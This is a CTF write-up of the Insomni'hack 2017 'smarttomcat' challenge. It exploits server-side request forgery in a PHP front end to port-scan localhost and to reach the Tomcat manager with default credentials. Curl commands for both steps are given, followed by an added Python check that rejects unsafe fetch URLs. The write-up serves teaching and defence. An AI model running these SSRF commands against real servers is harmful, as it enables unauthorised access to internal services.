Tags: web
Writeup
The Insomni’hack teaser 2017 was a fun CTF with a good spread between easy and hard challenges.
The smarttomcat challenge was an easy web challenge about
attacking a badly secured Tomcat server. As a user you were presented
with a web page that had a backend written in PHP, and that backend called a
Tomcat server on localhost.
Looking at the form POST data from the browser, it became
apparent that the URL the backend called was submitted by the form.
This enabled us to write a port scan as a simple bash loop:
for x in $(seq 1 65535); do echo $x >> /tmp/log && curl 'http://smarttomcat.teaser.insomnihack.ch/index.php' --data "u=http%3A%2F%2Flocalhost%3A$x%2F" >> /tmp/log; done
This didn’t really help us. We then realized that we could access the
Tomcat management URL on the same port as the rest of the application. A
simple Google search gave us the default username and password.
Solution
curl 'http://smarttomcat.teaser.insomnihack.ch/index.php' --data 'u=http://tomcat:[email protected]:8080/manager/html'
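The root cause above is a backend that fetches whatever URL the form submits. As an added example (not part of the original writeup or the challenge's code), this Python sketch shows the check such a backend needs before fetching: it rejects embedded credentials and any host that resolves to a non-public address. `check_fetch_url`, `sample_resolver` and the DNS table are hypothetical names with constructed data.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed sample DNS data so the demo runs offline (not real lookups).
SAMPLE_DNS = {
    "localhost": ["127.0.0.1", "::1"],
    "intranet.example": ["10.0.0.5"],
    "public.example": ["93.184.216.34"],
}

def sample_resolver(host):
    """Offline stand-in for DNS, backed by the constructed table above."""
    return SAMPLE_DNS.get(host, [])

def system_resolver(host):
    """Resolve a host name with the OS resolver (what production would use)."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]

def check_fetch_url(url, resolver=system_resolver):
    """Return (allowed, reason) for a user-supplied URL the backend would fetch."""
    try:
        parts = urlsplit(url)
        parts.port  # accessing .port raises ValueError on a bad port
    except ValueError:
        return False, "malformed URL"
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in URL"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addresses = [str(ipaddress.ip_address(host))]  # host is a literal IP
    except ValueError:
        try:
            addresses = list(resolver(host))
        except OSError:
            addresses = []
    if not addresses:
        return False, "host does not resolve"
    for addr in addresses:
        # Loopback, private, link-local and reserved ranges are all non-global.
        if not ipaddress.ip_address(addr).is_global:
            return False, f"{addr} is not a public address"
    return True, "ok"
```

A real fetcher must also connect to the exact address that passed the check and re-run the check on every redirect, since a second DNS lookup can return a different answer.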